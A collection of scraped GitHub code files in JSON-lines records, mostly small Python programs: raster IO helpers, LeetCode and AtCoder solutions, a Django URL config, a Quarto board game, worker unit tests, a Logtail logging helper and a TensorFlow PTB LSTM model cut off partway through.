np.bool:\n im = im.astype('uint8')\n binary = True if binary is None else binary\n\n if binary:\n png_opts = png_opts + (cv2.IMWRITE_PNG_BILEVEL, 1)\n\n return cv2.imwrite(fname, im, png_opts)\n\n\ndef geo_file_info(fname, band_names=None):\n import rasterio\n\n def band_name(idx):\n if band_names is None:\n return None\n return band_names[idx]\n\n def info(f):\n def band_info(idx):\n return BandInfo(f.dtypes[idx], f.nodatavals[idx], f.block_shapes[idx], band_name(idx))\n\n bands = [band_info(i) for i in range(f.count)]\n return GeoFileInfo(f.crs.to_dict(), f.affine, f.shape, bands)\n\n if isinstance(fname, str):\n with rasterio.open(fname, 'r') as f:\n return info(f)\n return info(fname)\n\n\ndef geo_load(fname, fix_nodata=True, band_names=None):\n import rasterio\n\n def bad_nodata(band):\n if np.dtype(band.dtype).kind == 'f':\n if (band.nodata is not None) and (not np.isnan(band.nodata)):\n return True\n return False\n\n def fix_band_info(band):\n T = type(band)\n band = band._asdict()\n band['nodata'] = np.nan\n return T(**band)\n\n with rasterio.open(fname, 'r') as f:\n info = geo_file_info(f, band_names=band_names)\n bands = []\n\n for i, band in enumerate(info.bands):\n data = f.read(i+1)\n\n if fix_nodata and bad_nodata(band):\n data[data == band.nodata] = np.nan\n info.bands[i] = fix_band_info(band)\n\n bands.append(data)\n\n return info, bands\n","repo_name":"GeoscienceAustralia/dggs-pilot","sub_path":"dggs/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"29301119685","text":"import sys\n\nx = int(sys.stdin.readline().strip())\n\ndef get_dic(x):\n res = []\n for i in range(1, x):\n for j in range(1, x):\n if i+j <= x:\n res.append([i,j])\n result = []\n for m in range(len(res)): \n [i,j] = res[m]\n num = get_index(i,j,x)\n if num != -1:\n result.append(num+1)\n\n dic = {}\n for i in result:\n if i not in dic:\n dic[i] = 1\n else:\n dic[i] += 1\n return dic\n\n\ndef get_index(i,j, x):\n alist = [i, j]\n while j < x:\n i, j = j, i+j\n alist.append(j)\n if x in alist:\n xindex = alist.index(x)\n return xindex\n 
else:\n        return -1\n\ndic = get_dic(x)\nkeys = []\nfor key in dic.keys():\n    keys.append(key)\nkeys.sort()\nfor i in keys:\n    print(str(i) + ' ' + str(dic[i]))","repo_name":"mantianwuming/work_test","sub_path":"work/sougou_test1_outoftime.py","file_name":"sougou_test1_outoftime.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"}
{"seq_id":"25208548380","text":"\"\"\"\nhttps://leetcode.com/problems/isomorphic-strings/description/?envType=study-plan&id=level-1\n\n12/12/2022, 12/13/2022\n\narrays\n\n--- PROMPT ---\n\nGiven two strings s and t, determine if they are isomorphic.\n\nTwo strings s and t are isomorphic if the characters in s can be replaced to get t.\n\nAll occurrences of a character must be replaced with another character while preserving the order of characters. No two characters may map to the same character, but a character may map to itself.\n--- LESSONS ---\nyou can run for loops, lengths, indexes on strings!\n\n--- QUESTIONS ---\n\n--- PSEUDOCODE ---\nstrings are isomorphic if they are isomorphic in both directions\nBuild a map that maps the changes between strings (do this as you loop thru strings)\n\nif you notice that the character is in the map, and it DOESN'T map to the corresponding char, then you return false\notherwise, keep building your map\n\nif you get thru the entire list without triggering the False return, then return True\n\n\"\"\"\n\n\n# --- MY SOLUTION ---\nclass Solution(object):\n    def isIsomorphic(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: bool\n\n        \"\"\"\n        # build the map associations between the strings\n        mapST = {}\n        mapTS = {}\n# you can loop thru two strings of same length at the same time using zip()\n# for c1, c2 in zip(s, t)\n\n        for i in range(len(s)):\n            c1 = s[i]\n            c2 = t[i]\n\n            # need to check for a conflicting mapping (returning false)\n            # we need to do this check \n            if ((c1 in mapST and mapST[c1] != c2) or (c2 in mapTS and mapTS[c2] != c1)):\n                return False\n\n            # the order of where you put this matters (it can't be placed before the if statement)\n            mapST[c1] = c2\n            mapTS[c2] = c1\n        return True\n\n\"\"\"\n    My solution at first:\n    Tricky solution:\n    manipulate one string against the other string\n    and then in the end, check if the two strings are the same\n\n    failing case:\n    s = 'badc', t = 'baba'\n\n    my original solution... 
figured this out on my own, but it didn't work\n    if len(s) != len(t):\n            return False\n\n        rev_t = t\n        for i in range(len(t)):\n            prefix_t = rev_t[:i]\n            postfix_t = rev_t[i:]\n            postfix_t = postfix_t.replace(t[i],s[i])\n            rev_t = prefix_t + postfix_t\n\n        rev_s = s\n        for i in range(len(s)):\n            prefix = rev_s[:i]\n            postfix = rev_s[i:]\n            postfix = postfix.replace(s[i],t[i])\n            rev_s = prefix + postfix\n\n\n        print(rev_s, t)\n        print(rev_t, s)\n        if rev_s == t and rev_t == s:\n            return True\n        return False\n    \"\"\"\n\n# --- TEST ---\na = Solution()\nb = a.isIsomorphic('paper', 'title')\nprint(b)\n\n# --- ALT SOLN by others ---\n","repo_name":"callmelazarus/leetcode-codewars-journey","sub_path":"ARRAYS n HASHING/isomorphic_string_e205.py","file_name":"isomorphic_string_e205.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"1243249700","text":"import bisect\r\nimport typing\r\n\r\n\r\nclass FenwickTree: # version not using dataclass for performance.\r\n    def __init__(self, arr: typing.List[int]) -> None:\r\n        n = len(arr)\r\n        data = [0] * (n + 1)\r\n        data[1:] = arr.copy()\r\n        for i in range(n):\r\n            j = i + (i & -i)\r\n            if j > n:\r\n                continue\r\n            data[j] = max(data[j], data[i])\r\n        self.__data = data\r\n\r\n    def __len__(self) -> int:\r\n        return len(self.__data) - 1\r\n\r\n    def __setitem__(self, i: int, x: int) -> None:\r\n        assert 0 <= i < len(self.__data) - 1\r\n        i += 1\r\n        while i < len(self.__data):\r\n            self.__data[i] = max(self.__data[i], x)\r\n            i += i & -i\r\n\r\n    def __getitem__(self, i: int) -> int:\r\n        assert 0 <= i < len(self.__data)\r\n        v = 0\r\n        while i > 0:\r\n            v = max(v, self.__data[i])\r\n            i -= i & -i\r\n        return v\r\n\r\n\r\ndef main() -> None:\r\n    n = int(input())\r\n    p = list(map(int, input().split()))\r\n    q = list(map(int, input().split()))\r\n    divisor_indices = [[] for _ in range(n + 1)]\r\n    for i, x in enumerate(p):\r\n        for y in range(x, n + 1, x):\r\n            divisor_indices[y].append(i + 1)\r\n    # index = [0] * (n + 1)\r\n    # dp = [[(0, -1)] * 2 for _ in range(n + 1)]\r\n    # # (count, last index)\r\n    # for i, x in enumerate(q):\r\n    #     # y = q[i]\r\n\r\n\r\n    # print(divisor_indices)\r\n    fw = FenwickTree([0] * (n + 1))\r\n    # dp = [0] * (n + 1)\r\n    for x in q:\r\n        for last in divisor_indices[x][::-1]:\r\n            # dp[last] = max(dp[last], dp[last - 1] + 1)\r\n            fw[last] = fw[last] + 1\r\n    # print(dp)\r\n    # print(dp)\r\n    print(fw[n + 1])\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/arc133/arc133_b/28688437.py","file_name":"28688437.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"}
{"seq_id":"4593319044","text":"from django.urls import path\nfrom .views import (BlogList,\n                    BlogDetail,\n                    CreateBlog,\n                    UpdateBlog,\n                    DeleteBlog,\n)\n\n\napp_name = 'blog'\n\n\nurlpatterns = [\n    path('/delete/create/', DeleteBlog.as_view(), name='create'),\n    path('', BlogList.as_view(), name='list'),\n    path('create/', CreateBlog.as_view(), name='delete'),\n    path('<int:pk>/update/', UpdateBlog.as_view(), name='update'),\n    path('detail/<int:pk>/', BlogDetail.as_view(), name='detail'),\n]\n\n","repo_name":"Tosin-JD/tosin_blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"30752861571","text":"#!/usr/bin/python3\n\n\nfrom datetime 
import datetime, timezone\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom email.utils import parsedate_to_datetime\n\n\ndef logMessage(level, app, message):\n now = datetime.now() # current date and time\n\n date_time = now.strftime(\"%Y-%m-%d %H:%M:%S +0100\")\n\n# print (date_time)\n url = \"https://in.logtail.com/\"\n\n payload={\"dt\":date_time,\"level\":level,\"app\":app,\"message\":message}\n# print (payload)\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer kiXyuTMDKGVA5axjd5qnc4R7'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n# print (response)\n# data = json.loads(response.text)\n\n\nif __name__ == '__main__':\n\n logMessage(\"INFO\", \"logtail\", \"Testmessage\")\n","repo_name":"heron5/php_StyrelserummetApi","sub_path":"logtail.py","file_name":"logtail.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74718697152","text":"import itertools\nfrom copy import copy\nfrom quarto import SIZE, is_win, board_string, make_move\n\n# Description of pieces, a 4-dimensional binary space.\npiece_descriptions = {}\nfor a, size in enumerate(['short', 'tall']):\n for b, color in enumerate(['dark', 'light']):\n for c, shape in enumerate(['round', 'square']):\n for d, density in enumerate(['hollow', 'solid']):\n piece = (bool(a), bool(b), bool(c), bool(d))\n piece_descriptions[piece] = (size, color, shape, density)\n\ndef game(player_a, player_b):\n \"\"\"\n Play a game between two player functions.\n \"\"\"\n pieces = list(piece_descriptions.keys())\n\n # Board mapping positions to pieces currently occupying that position.\n board = {}\n for x in range(SIZE):\n for y in range(SIZE):\n board[(x, y)] = None\n\n current_piece = None\n for score, current_player in itertools.cycle([(+1, player_a), (-1, player_b)]):\n # Remove the current piece from available pieces, and give it to the current player.\n if current_piece:\n pieces.remove(current_piece)\n # Current player places the piece at `pos`, and chooses a piece for the opponent.\n pos, next_piece = current_player(copy(board), copy(pieces), current_piece)\n #print('player moved at %s, and chose %s' % (pos, next_piece))\n if pos:\n assert board[pos] is None # Don't allow playing on occupied positions.\n board = make_move(board, current_piece, pos)\n current_piece = next_piece\n\n #print(board_string(board))\n\n if is_win(board):\n #print('%s wins!' 
% current_player.__name__)\n return score\n\n if not pieces:\n # Game over, draw.\n #print('draw')\n return 0\n\ndef match(player_a, player_b, num_games, verbose=False):\n a_score = 0\n b_score = 0\n ties = 0\n for i in range(num_games):\n if i % 2 == 0:\n result = game(player_a, player_b)\n else:\n result = -game(player_b, player_a)\n\n if result == +1:\n a_score += 1\n elif result == -1:\n b_score += 1\n elif result == 0:\n ties += 1\n\n if verbose:\n print(player_a.__name__, a_score)\n print(player_b.__name__, b_score)\n print('ties', ties)\n\n return (a_score, b_score, ties)\n\nif __name__ == '__main__':\n from players import bot_random, bot_oneply, bot_twoply, bot_wholeply\n #a, b, t = match(bot_random, bot_oneply, 100, verbose=True)\n #a, b, t = match(bot_twoply, bot_oneply, 100, verbose=True)\n a, b, t = match(bot_twoply, bot_wholeply, 100, verbose=True)\n","repo_name":"christian-oudard/quarto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15970676740","text":"import os\nimport pickle\n\nfrom sentiment_analysis.exception import CustomException\n\n\ndef save_object(file_path, object):\n \"\"\"function to save an object in input into a pkl file\"\"\"\n try:\n dir_path = os.path.dirname(file_path)\n\n os.makedirs(dir_path, exist_ok=True)\n\n with open(file_path, \"wb\") as f:\n pickle.dump(object, f)\n\n except Exception as e:\n raise CustomException(e)\n","repo_name":"RedhaWassim/Sentiment-Analysis","sub_path":"sentiment_analysis/machine_learning/utils/saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"} +{"seq_id":"13257757936","text":"import pytest\n\nfrom worker import Worker\nfrom enums import WorkerState, FactoryItem\n\n\ndef test_initialising_worker():\n worker = Worker()\n\n assert worker.current_state == WorkerState.LOOKING_FOR_PARTS\n assert worker.inventory == set()\n\n\n@pytest.mark.parametrize(\n \"part\",\n [FactoryItem.COMPONENT_A, FactoryItem.COMPONENT_B],\n)\ndef test_pick_up_part(part):\n worker = Worker()\n assert len(worker.inventory) == 0\n\n worker.pick_up_part(part)\n assert len(worker.inventory) == 1\n\n\ndef test_pick_up_part_both_parts_inventory():\n worker = Worker()\n\n assert not worker.pick_up_part(FactoryItem.COMPONENT_A)\n assert worker.time_until_completion == 0\n assert worker.new_state is None\n\n assert worker.pick_up_part(FactoryItem.COMPONENT_B)\n assert worker.time_until_completion == 3\n assert worker.new_state == WorkerState.ASSEMBLING\n\n\n@pytest.mark.parametrize(\n \"timer, expected\",\n [(3, False), (2, False), (1, True)],\n)\ndef test_continue_assembling(timer, expected):\n worker = Worker()\n worker.current_state = WorkerState.ASSEMBLING\n worker.time_until_completion = timer\n\n assert worker.continue_assembling() == expected\n\n\ndef test_drop_completed_item():\n worker = Worker()\n worker.current_state = WorkerState.WAITING_TO_DROP_ITEM\n worker.inventory = {FactoryItem.FINISHED_PRODUCT}\n\n assert worker.drop_completed_item()\n assert len(worker.inventory) == 0\n assert worker.new_state == WorkerState.LOOKING_FOR_PARTS\n\n\n@pytest.mark.parametrize(\n \"inventory, part, expected\",\n [\n (\n {FactoryItem.COMPONENT_A, FactoryItem.COMPONENT_B},\n FactoryItem.COMPONENT_A,\n False,\n ),\n (\n {FactoryItem.COMPONENT_A},\n FactoryItem.COMPONENT_A,\n False,\n ),\n (\n 
{FactoryItem.COMPONENT_B},\n FactoryItem.COMPONENT_A,\n True,\n ),\n (\n set(),\n FactoryItem.COMPONENT_B,\n True,\n ),\n ],\n)\ndef test_is_part_desired_by_worker(inventory, part, expected):\n worker = Worker()\n worker.inventory = inventory\n\n assert worker.is_part_desired_by_worker(part) == expected\n\n\n@pytest.mark.parametrize(\n \"current_state, new_state\",\n [\n (WorkerState.LOOKING_FOR_PARTS, WorkerState.ASSEMBLING),\n (WorkerState.ASSEMBLING, WorkerState.WAITING_TO_DROP_ITEM),\n (WorkerState.WAITING_TO_DROP_ITEM, WorkerState.LOOKING_FOR_PARTS),\n (\n WorkerState.LOOKING_FOR_PARTS,\n WorkerState.LOOKING_FOR_PARTS,\n ), # currently accepted even though this state change should not happen\n (\n WorkerState.LOOKING_FOR_PARTS,\n WorkerState.WAITING_TO_DROP_ITEM,\n ), # currently accepted even though this state change should not happen\n (\n WorkerState.ASSEMBLING,\n WorkerState.WAITING_TO_DROP_ITEM,\n ), # currently accepted even though this state change should not happen\n ],\n)\ndef test_set_new_state(current_state, new_state):\n worker = Worker()\n worker.current_state = current_state\n worker.new_state = new_state\n\n worker.set_new_state()\n assert worker.current_state == new_state\n assert worker.new_state is None\n","repo_name":"JanAdamiak/Yagro_assessment","sub_path":"tests/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41206605149","text":"cost = 0\r\nfree = 0\r\npartly = 990\r\nfull = 1390\r\nage_list = []\r\ntickets = (int(input('Введите количество билетов, которое хотите приобрести\\n')))\r\nfor i in range(1, tickets+1):\r\n age = int(input(f'Билет {i}. Введите возраст: \\n'))\r\n age_list.append(age)\r\n if age < 18:\r\n cost += free\r\n elif 18 <= age <= 25:\r\n cost += partly\r\n else:\r\n cost += full\r\n\r\nif tickets > 3:\r\n discount_cost = int(cost * 0.9)\r\n print('Стоимость билетов со скидкой: ', discount_cost, 'рублей')\r\nelse:\r\n print(\"Стоимость билетов составляет: \", cost, \"рублей\")\r\n","repo_name":"Sonne-commit/Sonne","sub_path":"18.8.19 Домашняя работа.py","file_name":"18.8.19 Домашняя работа.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72364650432","text":"# coding=utf-8\nimport json\nimport os\nimport re\n\n\ndef combine_path(base, *path1):\n r = base\n for p in path1:\n r = os.path.join(r, *re.split(r'[/\\\\]', p))\n return r\n\n\nif __name__ == '__main__':\n remote = r'\\\\192.168.1.8'\n f = r'\\\\192.168.1.8\\corpus\\project\\matong\\tts_test\\summary_info.txt'\n d = {}\n with open(f, 'r', encoding='utf-8') as rf:\n lines = rf.readlines()\n for line in lines:\n es = line.split('\\t')\n d[es[0]] = d.get(es[0]) or []\n name = os.path.basename(es[1].strip()).replace('.wav', '')\n tmp = {'aid': name, 'content': es[0], 'source': combine_path(remote, es[1].strip())}\n d[es[0]].append(tmp.__str__())\n with open('tmp.json', 'w+', encoding='utf-8') as wf:\n json.dump(d, wf, indent=4, ensure_ascii=False)\n","repo_name":"leiax00/AutoSpeechTest","sub_path":"scripts/tts_for_autoTest.py","file_name":"tts_for_autoTest.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25481943924","text":"import random\nbossRaw = [i.strip().split() for i in open(\"Advent of Code/Day 22/boss.txt\").readlines()]\nboss, 
player = {\"H\":int(bossRaw[0][1]), \"D\":int(bossRaw[1][1]), \"E\":[]}, {\"H\":50, \"M\":500, \"A\": 0, \"E\":[], \"T\":0}\n\ndef magic_missile(boss, player):\n player[\"M\"] -= 53\n boss[\"H\"] -= 4\n return boss, player\n\ndef drain(boss, player):\n player[\"M\"] -= 73\n player[\"T\"] += 73\n player[\"H\"] += 2\n boss[\"H\"] -= 2\n return boss, player\n\ndef shield(player):\n player[\"M\"] -= 113\n player[\"T\"] += 113\n player[\"E\"].append({\"T\": 6, \"N\":\"S\"})\n return player\n\ndef poison(boss, player):\n player[\"M\"] -= 173\n player[\"T\"] += 173\n boss[\"E\"].append({\"T\":6, \"N\":\"P\"})\n return boss, player\n\ndef recharge(player):\n player[\"M\"] -= 229\n player[\"T\"] += 229\n player[\"E\"].append({\"T\":5, \"N\":\"R\"})\n return player\n\ndef effects(char):\n for i in char[\"E\"]:\n i[\"T\"] -= 1\n if i[\"N\"] == \"S\": char[\"A\"] = 0 if i[\"T\"] == 0 else 7\n elif i[\"N\"] == \"P\": char[\"H\"] -= 3\n elif i[\"N\"] == \"R\": char[\"M\"] += 101\n if i[\"T\"] == 0: char[\"E\"].remove({\"N\":i[\"N\"], \"T\":0})\n return char\n\ndef validCast(spell, boss, player):\n if spell == \"M\" and player[\"M\"] < 53: return False\n elif spell == \"D\" and player[\"M\"] < 73: return False\n elif spell == \"S\" and player[\"M\"] < 113: return False\n elif spell == \"S\" and player[\"M\"] < 173 and True in [i[\"N\"] == \"S\" for i in player[\"E\"]]: return False\n elif spell == \"P\" and player[\"M\"] < 173 and True in [i[\"N\"] == \"P\" for i in boss[\"E\"]]: return False\n elif spell == \"R\" and player[\"M\"] < 229 and True in [i[\"N\"] == \"R\" for i in player[\"E\"]]: return False\n return True\n\ndef fight(boss, player, rSeed):\n random.seed(rSeed)\n spells, pTurn = [\"M\", \"D\", \"S\", \"P\", \"R\"], False\n while player[\"H\"] > 0 and boss[\"H\"] > 0:\n if pTurn:\n player[\"H\"] -= max(boss[\"D\"] - player[\"A\"], 1)\n else:\n if player[\"M\"] >= 53: return False\n vCast = False\n while not vCast:\n cast = random.choice(spells)\n vCast = validCast(cast, boss, player)\n if cast == \"M\": boss, player = magic_missile(boss, player)\n elif cast == \"D\": boss, player = drain(boss, player)\n elif cast == \"S\": player = shield(player)\n elif cast == \"P\": boss, player = poison(boss, player)\n elif cast == \"R\": player = recharge(player)\n boss, player = effects(boss), effects(player)\n pTurn = not pTurn\n return pTurn, player[\"T\"]\n\nfor i in range(1000000):\n if fight(boss, player, i):\n print(i)\n break\n","repo_name":"tkern0/misc","sub_path":"Advent of Code/Day 22/advent.py","file_name":"advent.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25486923030","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnLSTM\nfrom tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import RNNParamsSaveable\nfrom tensorflow.contrib.legacy_seq2seq.python.ops.seq2seq import sequence_loss_by_example\n\nimport time\nimport sys\nsys.stdout = sys.stderr\nimport tensorflow as tf\nimport numpy as np\n#from tensorflow.models.rnn.ptb import reader\nimport reader\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\n \"model\", \"small\",\n \"A type of model. 
Possible options are: small, medium, large.\")\nflags.DEFINE_bool(\"use_fp16\", False, \"Train using 16-bit floats instead of 32bit floats\")\nflags.DEFINE_bool('debug', False, 'More debug info in Tensorboard')\nflags.DEFINE_string('cost_function', 'default', 'Which cost function to use')\nflags.DEFINE_string('optimizer', 'GradientDescentOptimizer', 'Which optimizer to use')\nflags.DEFINE_bool('non_rnn_in_fp32', True, 'Perform non-rnn layers in fp32')\nflags.DEFINE_string(\"data_path\", None, \"Where the training/test data is stored.\")\nflags.DEFINE_string(\"save_path\", None, \"Model output directory.\")\nflags.DEFINE_float(\"reg_term\", 0.0, \"L2 regularization of parameters\")\nflags.DEFINE_float(\"init_scale\", 0.0, \"initialization for weights will be [-init_scale, init_scale]\")\nflags.DEFINE_float(\"initial_lr\", 0.0, \"learning rate for 0 epoch\")\nflags.DEFINE_integer(\"max_valid_increases\", 1, \"max number of times validation error can go up before action is taken\")\nflags.DEFINE_integer(\"gseed\", 1, \"graph level random seed\")\n\nFLAGS = flags.FLAGS\nprint('Model is: %s' % FLAGS.model)\nprint('use_fp16 is: %s' % FLAGS.use_fp16)\nprint('cost function is: %s' % FLAGS.cost_function)\nprint('optimizer is: %s' % FLAGS.optimizer)\nprint('do non rnn layers in fp32: %s' % FLAGS.non_rnn_in_fp32)\nprint('output debug info: %s' % FLAGS.debug)\nprint('l2 regularizer weight: %s' % FLAGS.reg_term)\nprint('weight initializer init_scale: %s' % (FLAGS.init_scale if FLAGS.init_scale else 'will use model default'))\nprint('initial learning rate: %s' % FLAGS.initial_lr)\nprint('Gseed: %s' % FLAGS.gseed)\n\n\ndef data_type(is_lstm_layer=False):\n if not is_lstm_layer and FLAGS.non_rnn_in_fp32:\n return tf.float32\n else:\n return tf.float16 if FLAGS.use_fp16 else tf.float32\n\ndef variable_summaries(var, name):\n \"\"\"Attach a lot of summaries to a Tensor.\n This is also quite expensive.\n \"\"\"\n with tf.name_scope('summaries'):\n s_var = tf.cast(var, tf.float32)\n amean = tf.reduce_mean(tf.abs(s_var))\n tf.summary.scalar('amean/' + name, amean)\n mean = tf.reduce_mean(s_var)\n tf.summary.scalar('mean/' + name, mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_sum(tf.square(s_var - mean)))\n tf.summary.scalar('sttdev/' + name, stddev)\n tf.summary.scalar('max/' + name, tf.reduce_max(s_var))\n tf.summary.scalar('min/' + name, tf.reduce_min(s_var))\n tf.summary.histogram(name, var)\n\n\nclass PTBModel(object):\n \"\"\"The PTB model.\"\"\"\n\n def __init__(self, is_training, config, debug=False):\n self.batch_size = batch_size = config.batch_size\n self.num_steps = num_steps = config.num_steps\n self.size = size = config.hidden_size\n vocab_size = config.vocab_size\n self.num_layers = config.num_layers\n\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n\n embedding = tf.get_variable(\"embedding\", [vocab_size, size], dtype=data_type(is_lstm_layer=False))\n inputs = tf.nn.embedding_lookup(embedding, self._input_data, name=\"inputs_to_rnn\")\n if debug:\n variable_summaries(inputs, \"inputs_to_rnn\")\n\n if is_training and config.keep_prob < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob)\n\n rnn = CudnnLSTM(config.num_layers, size, size, input_mode='linear_input', direction='unidirectional',\n dropout=config.keep_prob, seed=0, seed2=0)\n params_size_t = rnn.params_size()\n self._initial_input_h = tf.placeholder(data_type(is_lstm_layer=True), shape=[config.num_layers, batch_size, 
size]) #self._initial_input_h = tf.Variable(tf.zeros([config.num_layers, batch_size, size]))\n self._initial_input_c = tf.placeholder(data_type(is_lstm_layer=True), shape=[config.num_layers, batch_size, size]) #self._initial_input_c = tf.Variable(tf.zeros([config.num_layers, batch_size, size]))\n #self.params = tf.get_variable(\"params\", [params_size_t], validate_shape=False, dtype=data_type(is_lstm_layer=False))\n self.params = tf.Variable(tf.random_uniform([params_size_t], minval=-config.init_scale, maxval=config.init_scale, dtype=data_type(is_lstm_layer=True)), validate_shape=False)\n self.params_size_t = rnn.params_size()\n\n outputs, output_h, output_c = rnn(is_training=is_training, input_data=tf.transpose(tf.cast(inputs, dtype=data_type(is_lstm_layer=True)), [1, 0, 2]), input_h=self.input_h,\n input_c=self.input_c, params=self.params)\n\n self._output_h = output_h\n self._output_c = output_c\n\n output = tf.reshape(tf.concat(values=tf.transpose(outputs, [1, 0, 2]), axis=1), [-1, size])\n\n if debug:\n variable_summaries(output, 'multiRNN_output')\n\n softmax_w = tf.get_variable(\"softmax_w\", [size, vocab_size], dtype=data_type(is_lstm_layer=False))\n softmax_b = tf.get_variable(\"softmax_b\", [vocab_size], dtype=data_type(is_lstm_layer=False))\n logits = tf.matmul(output if output.dtype == data_type(is_lstm_layer=False) else tf.cast(output, data_type(is_lstm_layer=False)), softmax_w) + softmax_b\n\n if debug:\n variable_summaries(logits, 'logits')\n\n #loss = tf.contrib.nn.seq2seq.sequence_loss_by_example(\n loss = sequence_loss_by_example( \n [logits],\n [tf.reshape(self._targets, [-1])],\n [tf.ones([batch_size * num_steps], dtype=data_type(is_lstm_layer=False))])\n\n self._cost = cost = tf.reduce_sum(loss) / batch_size\n if FLAGS.cost_function == 'avg':\n self._cost_to_optimize = cost_to_optimize = tf.reduce_mean(loss)\n else:\n self._cost_to_optimize = cost_to_optimize = cost\n\n tvars = tf.trainable_variables()\n for v in tvars:\n cost_to_optimize += FLAGS.reg_term * tf.cast(tf.nn.l2_loss(v), dtype=data_type(False)) / (batch_size*config.num_steps)\n self._cost_to_optimize = cost_to_optimize\n\n if debug:\n tf.summary.scalar('cost no regularization', cost)\n tf.summary.scalar('cost_to_optimize', cost_to_optimize)\n\n #self._final_state = state\n\n if not is_training:\n self.merged = tf.summary.merge_all()\n return\n\n self._lr = tf.Variable(0.0, trainable=False, dtype=data_type(is_lstm_layer=False))\n #if debug:\n # tf.scalar_summary('learning rate', self._lr)\n\n #tvars = tf.trainable_variables()\n type2vars = dict()\n print(\"**************************\")\n print(\"Trainable Variables\")\n print(\"**************************\")\n for var in tvars:\n print('Variable name: %s. With dtype: %s and shape: %s' % (var.name, var.dtype, var.get_shape()))\n if var.dtype not in type2vars:\n type2vars[var.dtype] = [var]\n else:\n type2vars[var.dtype].append(var)\n\n print(\"**************************\")\n print(\"Gradients Variables\")\n print(\"**************************\")\n _grads = tf.gradients(cost_to_optimize, tvars)\n type2grads = dict()\n for g in _grads:\n print('Gradient name: %s. 
With dtype: %s' % (g.name, g.dtype))\n if g.dtype not in type2grads:\n type2grads[g.dtype] = [g]\n else:\n type2grads[g.dtype].append(g)\n\n type2clippedGrads = dict()\n for dtype in type2grads:\n cgrads, _ = tf.clip_by_global_norm(type2grads[dtype], config.max_grad_norm)\n type2clippedGrads[dtype] = cgrads\n\n\n if debug:\n for (gkey, vkey) in zip(type2clippedGrads.keys(),type2vars.keys()):\n for (clipped_gradient, variable) in zip(type2clippedGrads[gkey], type2vars[vkey]):\n variable_summaries(clipped_gradient, \"clipped_dcost/d\"+variable.name)\n variable_summaries(variable, variable.name)\n\n\n if FLAGS.optimizer == 'MomentumOptimizer':\n optimizer = tf.train.MomentumOptimizer(learning_rate=self._lr, momentum=0.9)\n elif FLAGS.optimizer == 'AdamOptimizer':\n optimizer = tf.train.AdamOptimizer()\n elif FLAGS.optimizer == 'RMSPropOptimizer':\n optimizer = tf.train.RMSPropOptimizer(learning_rate=self._lr)\n elif FLAGS.optimizer == 'AdagradOptimizer':\n optimizer = tf.train.AdagradOptimizer(learning_rate=self._lr)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self._lr)\n\n allgrads = []\n allvars = []\n for dtype in type2clippedGrads:\n allgrads += type2clippedGrads[dtype]\n\n #WARNING: key order assumption\n for dtype in type2vars:\n allvars += type2vars[dtype]\n\n self._train_op = optimizer.apply_gradients(zip(allgrads, allvars))\n\n self._new_lr = tf.placeholder(dtype=data_type(False), shape=[], name=\"new_learning_rate\")\n self._lr_update = tf.assign(self._lr, self._new_lr)\n self.merged = tf.summary.merge_all()\n\n def assign_lr(self, session, lr_value):\n session.run(self._lr_update, feed_dict={self._new_lr: lr_value})\n\n @property\n def input_data(self):\n return self._input_data\n\n @property\n def targets(self):\n return self._targets\n\n @property\n def initial_state(self):\n return self._initial_state\n\n @property\n def input_h(self):\n return self._initial_input_h\n\n @property\n def input_c(self):\n return self._initial_input_c\n\n @property\n def output_h(self):\n return self._output_h\n\n @property\n def output_c(self):\n return self._output_c\n\n @property\n def input(self):\n return self._input\n\n @property\n def cost(self):\n return self._cost\n\n @property\n def lr(self):\n return self._lr\n\n @property\n def train_op(self):\n return self._train_op\n\n\nclass SmallConfig(object):\n \"\"\"Small config.\"\"\"\n init_scale = 0.1\n learning_rate = 1.0\n max_grad_norm = 5\n 